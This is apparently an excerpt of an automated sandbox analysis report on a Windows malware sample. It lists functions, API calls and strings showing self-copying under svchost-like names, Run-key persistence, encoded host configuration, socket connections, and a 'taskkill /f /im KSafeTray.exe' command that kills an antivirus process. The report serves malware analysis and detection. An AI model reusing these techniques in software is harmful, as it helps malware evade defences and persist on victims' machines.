Instruction Fuzzy Hash: BBC09BB5551280EBC7006B719F0D5453994B6047017100077F141F15F1DB7800409F1D

Function 00408680 Relevance: 6.0, APIs: 4, Instructions: 37networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000000), ref: 0040868A
htons.WS2_32 ref: 004086B2
connect.WS2_32(00000000,?,00000010), ref: 004086C5
closesocket.WS2_32(00000000), ref: 004086D1

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: closesocketconnecthtonssocket
String ID:
API String ID: 3817148366-0
Opcode ID: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
Instruction ID: b5f64500789357e91306605df317961a8cc373726e32a30d19d3821c8ed13c85
Opcode Fuzzy Hash: 0a2ed5afde3e2c3bda8bc7a891d523bcba82ca95b19b28c83635fe27b66edda0
Instruction Fuzzy Hash: 02F062349042206BD600EB6C9D46BEB76A4EF89370F804B59FAB9A62E1E775440447DA

Function 004034E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004034FC
LoadLibraryA.KERNEL32(?), ref: 0040350C

Strings

hra%u.dll, xrefs: 004034F6

Memory Dump Source

Source File: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1327641678.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327667856.000000000040B000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327730411.000000000040C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1327752180.000000000040D000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_v5.jbxd

Yara matches

Similarity

API ID: LibraryLoadwsprintf
String ID: hra%u.dll
API String ID: 2341783205-640331709
Opcode ID: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
Instruction ID: 9e1dc9a3bb07ee0ff9ba8cfb77d47e9a35d0c50c1dd6ee90f04faac7d43bcb07
Opcode Fuzzy Hash: 8bf7e9fb9ad1096e0c2a838e42c02e5d3f33f34167617817d69d3a629a09b7b0
Instruction Fuzzy Hash: 2DD0A7F494020D67CB1097B4EE4EFC533AC5B14704F000170B746F20D0EAF4D1C88A99

Analysis Process: server.exePID: 7472, Parent PID: 7380COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	53.1%
Signature Coverage:	11.5%
Total number of Nodes:	716
Total number of Limit Nodes:	38

Executed Functions

Function 10001A20 Relevance: 242.1, APIs: 44, Strings: 94, Instructions: 586
sleepfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10001A51
wsprintfA.USER32 ref: 10001A8D

Part of subcall function 100018A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
Part of subcall function 100018A0: Process32First.KERNEL32(00000000,00000000), ref: 100018FF
Part of subcall function 100018A0: GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
Part of subcall function 100018A0: OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
Part of subcall function 100018A0: GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
Part of subcall function 100018A0: _strcmpi.MSVCRT ref: 100019C8
Part of subcall function 100018A0: CloseHandle.KERNEL32(00000000), ref: 100019D2
Part of subcall function 100018A0: Process32Next.KERNEL32(00000000,00000128), ref: 100019E2

CreateFileA.KERNEL32(?,C0000000,00000002,00000000,00000004,00000080,00000000), ref: 10001AB5
CloseHandle.KERNEL32(00000000), ref: 10001ABC
Sleep.KERNEL32(000001F4), ref: 10001ACD
FindFirstFileA.KERNEL32(?,?), ref: 10001ADF
GetCurrentDirectoryA.KERNEL32(00000104,00000000), ref: 10001B20
strstr.MSVCRT ref: 10001B33
Sleep.KERNEL32(0000EA60), ref: 10001B54
GetVersionExA.KERNEL32(?), ref: 10001B69
GetSystemDefaultLCID.KERNEL32 ref: 10001B6F
Sleep.KERNEL32(000493E0), ref: 10001BDB
Sleep.KERNEL32(00124F80), ref: 10001BE9
GetLocalTime.KERNEL32(?), ref: 10001BF3
wsprintfA.USER32 ref: 10001C37
_mkdir.MSVCRT ref: 10001C41
Sleep.KERNEL32(000003E8), ref: 10001C4F
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10001CA9
CopyFileA.KERNEL32(?,?,00000001), ref: 10001CC1

Strings

c, xrefs: 10001DA1
/, xrefs: 10001F76
c, xrefs: 100020EC
., xrefs: 10001E32
., xrefs: 10001DCF
o, xrefs: 10001FA8
t, xrefs: 10001D52
., xrefs: 10001E6A
m, xrefs: 10001E82
\svchost.exe, xrefs: 10001C51
f, xrefs: 10001F80
/, xrefs: 10001D6A
m, xrefs: 10001DAB
5, xrefs: 10001E52
\tt, xrefs: 1000205D
0, xrefs: 10001DB9
x, xrefs: 10001BBC
x, xrefs: 1000218C
., xrefs: 10001F9E
8, xrefs: 10001D97
c, xrefs: 10001FA3
c, xrefs: 10002128
., xrefs: 10001F7B
5, xrefs: 10001E62
/, xrefs: 10001F71
/, xrefs: 10001D65
., xrefs: 10001D7B
x, xrefs: 10001DD8
t, xrefs: 10001F63
t, xrefs: 100020FF
%s\%02d%02d%02d, xrefs: 10001C31
/, xrefs: 10001E15
., xrefs: 10002104
., xrefs: 10001D9C
o, xrefs: 100021DF
a, xrefs: 10001E3A
c, xrefs: 10001E72
/, xrefs: 100020DF
h, xrefs: 10001D4D
o, xrefs: 10001E7A
/, xrefs: 10001EAF
0, xrefs: 10001E4A
o, xrefs: 10001DA6
5, xrefs: 10001F99
2, xrefs: 10001FBC
x, xrefs: 10001F42
t, xrefs: 10001D57
x, xrefs: 1000210D
HOST, xrefs: 10001D02
0, xrefs: 10001FC4
7, xrefs: 10001E5A
8, xrefs: 10001D8D
k, xrefs: 10001D84
0, xrefs: 10001F8A
m, xrefs: 10001FAD
., xrefs: 10001FD4
., xrefs: 10001EBE
d, xrefs: 10001BAE
/, xrefs: 1000211B
2, xrefs: 10001DB4
t, xrefs: 10001F5E
5, xrefs: 10001F8F
f, xrefs: 10001E42
t, xrefs: 1000213B
8, xrefs: 10001D92
h, xrefs: 100021DA
p, xrefs: 10001D5C
2, xrefs: 10001E91
7, xrefs: 10001F94
AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==, xrefs: 10001CD4
x, xrefs: 100021EE
h, xrefs: 1000212D
t, xrefs: 100021E4
o, xrefs: 10002132
x, xrefs: 10001FE3
/, xrefs: 100021C4
/, xrefs: 10001FCC
p, xrefs: 10001DFE
c, xrefs: 100021CC
h, xrefs: 10001F59
t, xrefs: 10001DEE
0, xrefs: 10001E99
o, xrefs: 100020F6
\kk, xrefs: 10002025
open, xrefs: 10001D33, 10002250, 10002290, 100022CD
z, xrefs: 10001F85
., xrefs: 100021E9
/, xrefs: 10001DC6
/, xrefs: 10001E0D
%s\Default, xrefs: 10001A86
\bb, xrefs: 1000208C
h, xrefs: 100020F1
p, xrefs: 10001F68
., xrefs: 10002140

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: FileSleep$CloseCreateCurrentDirectoryFirstHandleModuleNameProcessProcess32Systemwsprintf$CopyDefaultFindLocalNextOpenSnapshotTimeToolhelp32Version_mkdir_strcmpistrstr
String ID: %s\%02d%02d%02d$%s\Default$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$2$2$2$5$5$5$5$7$7$8$8$8$AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==$HOST$\bb$\kk$\svchost.exe$\tt$a$c$c$c$c$c$c$d$f$f$h$h$h$h$h$k$m$m$m$o$o$o$o$o$o$open$p$p$p$t$t$t$t$t$t$t$t$x$x$x$x$x$x$x$z
API String ID: 3656591282-2909406114
Opcode ID: 178caa9a6ab39458405fe83c5bd611a03c837565114d2103d52ada2d58824686
Instruction ID: 533d04cf14412c8a4f261862c8818537b5c493b5014bb58e8f027dad95579e4f
Opcode Fuzzy Hash: 178caa9a6ab39458405fe83c5bd611a03c837565114d2103d52ada2d58824686
Instruction Fuzzy Hash: D332803114C3C09AE331C6788859B9FBFD6ABE2704F48495DE2C95B2D2CAF59608C767

Function 100022F0 Relevance: 63.4, APIs: 31, Strings: 5, Instructions: 351
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784

sprintf.MSVCRT ref: 10002389
CreateMutexA.KERNEL32(00000000,00000000,?), ref: 1000239C
GetLastError.KERNEL32 ref: 100023A4
CloseHandle.KERNEL32(00000000), ref: 100023B2
ExitProcess.KERNEL32 ref: 100023B9
GetCurrentProcessId.KERNEL32 ref: 100023BF
OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 100023CC
SetPriorityClass.KERNEL32(00000000,00000080), ref: 100023DA
CloseHandle.KERNEL32(00000000), ref: 100023E1
GetProcessWindowStation.USER32 ref: 1000241D
OpenWindowStationA.USER32(winsta0,00000000,02000000), ref: 1000242E
SetProcessWindowStation.USER32(00000000), ref: 10002439
SetErrorMode.KERNEL32(00000001), ref: 10002441
OpenEventA.KERNEL32(001F0003,00000000,?), ref: 100024D9
Sleep.KERNEL32(0000003C), ref: 100024E7
CloseHandle.KERNEL32(00000000), ref: 100024FE
??3@YAXPAX@Z.MSVCRT(?), ref: 1000251E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 10002573
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 100025C4
??3@YAXPAX@Z.MSVCRT(?), ref: 10002615
GetTickCount.KERNEL32 ref: 1000262D

Strings

BBBBBB, xrefs: 10002328, 1000258A
CCCCCC, xrefs: 1000233B, 10002535
winsta0, xrefs: 10002429
AAAAAA, xrefs: 10002317, 100025DB
KKKKKK, xrefs: 1000245E

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: ??3@Process$CloseHandleOpenResourceStationWindow$Error$??2@ClassCountCreateCurrentEventExitFindLastLoadLockModeMutexPrioritySleepTicksprintf
String ID: AAAAAA$BBBBBB$CCCCCC$KKKKKK$winsta0
API String ID: 2686462936-682215413
Opcode ID: e406c62dd523f7dc9c94be31558856dc13c0563786ec41141663d567de75603a
Instruction ID: d6d9c746deec09ccf39e80aeb4b031731eb3513f19be3073a2d6536fba1e20fc
Opcode Fuzzy Hash: e406c62dd523f7dc9c94be31558856dc13c0563786ec41141663d567de75603a
Instruction Fuzzy Hash: 29C1E4B55083819BF721DF64DC85F9B7799EB85380F00092DFA8993286DB74AD48C7A3

Function 100018A0 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 112
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100018DD
Process32First.KERNEL32(00000000,00000000), ref: 100018FF
GetCurrentProcessId.KERNEL32(00000000,00000000,00000002,00000000), ref: 10001914
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 10001930
GetModuleFileNameExA.PSAPI(00000000,00000000,00000000,00000104), ref: 10001950
_strcmpi.MSVCRT ref: 100019C8
CloseHandle.KERNEL32(00000000), ref: 100019D2
Process32Next.KERNEL32(00000000,00000128), ref: 100019E2
CloseHandle.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 10001A01

Strings

r, xrefs: 10001987
r, xrefs: 1000197E
p, xrefs: 1000196F
x, xrefs: 1000196A
l, xrefs: 10001974
x, xrefs: 10001995
o, xrefs: 10001979
., xrefs: 1000198C

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateCurrentFileFirstModuleNameNextOpenSnapshotToolhelp32_strcmpi
String ID: .$l$o$p$r$r$x$x
API String ID: 3180913536-1602884452
Opcode ID: ce14598f8a94e0c081870103145813617294ce4fd463c73516f04534971c8f84
Instruction ID: 3eff10a53c0cd3c299c3f0263232e505e9bf148dbb3316f1d2a2e0806b88e0d6
Opcode Fuzzy Hash: ce14598f8a94e0c081870103145813617294ce4fd463c73516f04534971c8f84
Instruction Fuzzy Hash: 0C41B4311093C19AF311CA28C8057DF7BD5EB96394F04096DF5D4962D1DBB8EA0C87A7

Function 100014B0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 115
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100014DC
FindFirstFileA.KERNEL32(?,?), ref: 10001546
CreateFileA.KERNEL32(?,10000000,00000001,00000000,00000003,00000080,00000000), ref: 1000157B
ReadFile.KERNEL32(00000000,?,00000104,?,00000000), ref: 10001598
wsprintfA.USER32 ref: 100015B5
CloseHandle.KERNEL32(00000000), ref: 100015BB
wsprintfA.USER32 ref: 100015CA
lstrlen.KERNEL32(?), ref: 100015D6
wsprintfA.USER32 ref: 100015E2
lstrlen.KERNEL32(?), ref: 100015E8

Part of subcall function 10001380: wsprintfA.USER32 ref: 100013C0
Part of subcall function 10001380: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100013EC
Part of subcall function 10001380: CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,-00000006), ref: 10001467
Part of subcall function 10001380: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,-00000006), ref: 1000148B
Part of subcall function 10001380: CloseHandle.KERNEL32(00000000,?,?,?,?,-00000006), ref: 10001492

Strings

XXXXXX, xrefs: 100014BF
Default, xrefs: 100015AF, 100015DC

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: File$wsprintf$Resource$CloseCreateDirectoryFindHandleSystemlstrlen$??2@??3@FirstLoadLockReadWrite
String ID: Default$XXXXXX
API String ID: 725747062-3873574582
Opcode ID: 0e0a1ed6f2c2dd669fb9ea203f7d5d0876e1410452d1336e98ef23fb2d9b3107
Instruction ID: 40cba41667d06f7893b38b0f0d94b15b22b4201403879db7e592d3493172572b
Opcode Fuzzy Hash: 0e0a1ed6f2c2dd669fb9ea203f7d5d0876e1410452d1336e98ef23fb2d9b3107
Instruction Fuzzy Hash: 4C31083120030467E318CB74DC91EEF379AEBC5771F040B2DFA56971C0DEA4AE0982A6

Function 00401000 Relevance: 7.6, APIs: 6, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7866654836aa60b89e9f9a1f09a6f3a833012675fa39c20709ec962009edebc5
Instruction ID: e16900cb5c4ece056a77d287793db1095366f4d6b5bb26a23405047953fa84d7
Opcode Fuzzy Hash: 7866654836aa60b89e9f9a1f09a6f3a833012675fa39c20709ec962009edebc5
Instruction Fuzzy Hash: 6B41B2B27003056FE714DF68AC81B67B398EB88355F14443AFA06EB691DAB5E81486A4

Function 1000D900 Relevance: 44.1, APIs: 16, Strings: 9, Instructions: 320
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C

Part of subcall function 1000DD1F: RegCloseKey.ADVAPI32(?,1000DAB6), ref: 1000DD29
Part of subcall function 1000DD1F: RegCloseKey.ADVAPI32(?), ref: 1000DD32

Strings

REG_BINARY, xrefs: 1000DCE5
%-25s %-15s %s , xrefs: 1000DC8B
REG_EXPAND_SZ, xrefs: 1000DC7F
REG_DWORD, xrefs: 1000DCAC
%-25s %-15s 0x%x(%d) , xrefs: 1000DCB8
REG_SZ, xrefs: 1000DC71
REG_MULTI_SZ, xrefs: 1000DCCB
[%s], xrefs: 1000DB91
%-25s %-15s , xrefs: 1000DCD7, 1000DCF1

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Close$Open
String ID: %-25s %-15s $%-25s %-15s %s $%-25s %-15s 0x%x(%d) $REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ$[%s]
API String ID: 2976201327-1612119606
Opcode ID: 18a16f3152cab2c84c8789727149057d95980c577145fc1441e5c8d43feecb8f
Instruction ID: 5f681d0d18a1945acf8fc48913839280a3791203cc6d3613b66fb068a083d58d
Opcode Fuzzy Hash: 18a16f3152cab2c84c8789727149057d95980c577145fc1441e5c8d43feecb8f
Instruction Fuzzy Hash: 13C187B19006589FEB14DF94CC84FEE73B9EB88300F504699F619A3184DBB4AE45CFA5

Function 10002AB0 Relevance: 42.1, APIs: 17, Strings: 7, Instructions: 119
threadstringsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32(00000000,00000000,100022F0,00000000,00000000,00000000), ref: 10002ACF
CloseHandle.KERNEL32(00000000), ref: 10002AD8

Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784

CreateThread.KERNEL32(00000000,00000000,10002820,00000000,00000000,00000000), ref: 10002B17
CloseHandle.KERNEL32(00000000), ref: 10002B1A
Sleep.KERNEL32(000001F4), ref: 10002B21
WinExec.KERNEL32(taskkill /f /im KSafeTray.exe,00000000), ref: 10002B3B
CreateThread.KERNEL32(00000000,00000000,10002930,00000000,00000000,00000000), ref: 10002B50
CloseHandle.KERNEL32(00000000), ref: 10002B53
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002B94
GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002BA4
lstrcat.KERNEL32(?,1007A0CC), ref: 10002BBA
lstrcat.KERNEL32(?,00000000), ref: 10002BD6
lstrcat.KERNEL32(?,.exe), ref: 10002BE2
MoveFileA.KERNEL32(?,?), ref: 10002BF1
CreateThread.KERNEL32(00000000,00000000,10001A20,00000000,00000000,00000000), ref: 10002C18
CloseHandle.KERNEL32(00000000), ref: 10002C1B
Sleep.KERNEL32(0002BF20), ref: 10002C22

Part of subcall function 10012620: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012628
Part of subcall function 10012620: ??2@YAPAXI@Z.MSVCRT(00000128,00000002,00000000,?,76F90F10,76F90F00,76F92EE0,10002B01,Rstray.exe), ref: 10012634
Part of subcall function 10012620: Process32First.KERNEL32(00000000,00000000), ref: 10012646
Part of subcall function 10012620: _strcmpi.MSVCRT ref: 10012658

Strings

LLLLLL, xrefs: 10002B60
XXXXXX, xrefs: 10002BC2
KSafeTray.exe, xrefs: 10002B23
Rstray.exe, xrefs: 10002AF7
taskkill /f /im KSafeTray.exe, xrefs: 10002B36
.exe, xrefs: 10002BDC
SSSSSS, xrefs: 10002ADF

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_server.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleThread$Resourcelstrcat$??2@FileSleep$??3@DirectoryExecFindFirstLoadLockModuleMoveNameProcess32SnapshotToolhelp32Windows_strcmpi
String ID: .exe$KSafeTray.exe$LLLLLL$Rstray.exe$SSSSSS$XXXXXX$taskkill /f /im KSafeTray.exe
API String ID: 1427586252-36606792
Opcode ID: 23f35e04005e4586122a6e20164817315ee34bf34b4add223461127f64101a58
Instruction ID: e5db488d9108fed6223139133818c57053fb22d89266da83dd4b914657c10bfb
Opcode Fuzzy Hash: 23f35e04005e4586122a6e20164817315ee34bf34b4add223461127f64101a58
Instruction Fuzzy Hash: 6A31B2B568034576F620EBA08C87FDA3399DB85B84F104914F745BA0C6DBF8F88486B9

Function 10002930 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 114
stringsleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10002959
GetWindowsDirectoryA.KERNEL32(?,00000100), ref: 10002969
lstrcat.KERNEL32(?,1007A0CC), ref: 1000297F

Part of subcall function 10009720: ??2@YAPAXI@Z.MSVCRT(00000400,?,76F90F10,76F92EE0,10002AEA,?,SSSSSS), ref: 10009728
Part of subcall function 10009720: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 10009749
Part of subcall function 10009720: LoadResource.KERNEL32(?,00000000), ref: 10009751
Part of subcall function 10009720: LockResource.KERNEL32(00000000), ref: 10009758
Part of subcall function 10009720: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009784

lstrcat.KERNEL32(?,00000000), ref: 1000299C
CreateDirectoryA.KERNEL32(?,00000000), ref: 100029A5
Sleep.KERNEL32(00000032), ref: 100029B3
wsprintfA.USER32 ref: 100029E8
lstrcat.KERNEL32(?,\svchsot.exe), ref: 100029F7
MoveFileA.KERNEL32(?,?), ref: 10002A1D
CopyFileA.KERNEL32(?,?,00000001), ref: 10002A32
wsprintfA.USER32 ref: 10002A4A
lstrlen.KERNEL32(?,00000000), ref: 10002A56
Sleep.KERNEL32(000003E8), ref: 10002A7F
FindWindowA.USER32(00000000,1007A204), ref: 10002A88
PostMessageA.USER32(00000000,00000010,00000000,00000000), ref: 10002A95

Strings

Run, xrefs: 10002A38
SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 10002A44
%s\JH.BAT, xrefs: 100029E2
LLLLLL, xrefs: 100029FE
XXXXXX, xrefs: 10002986
\svchsot.exe, xrefs: 100029F1

Memory Dump Source

Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
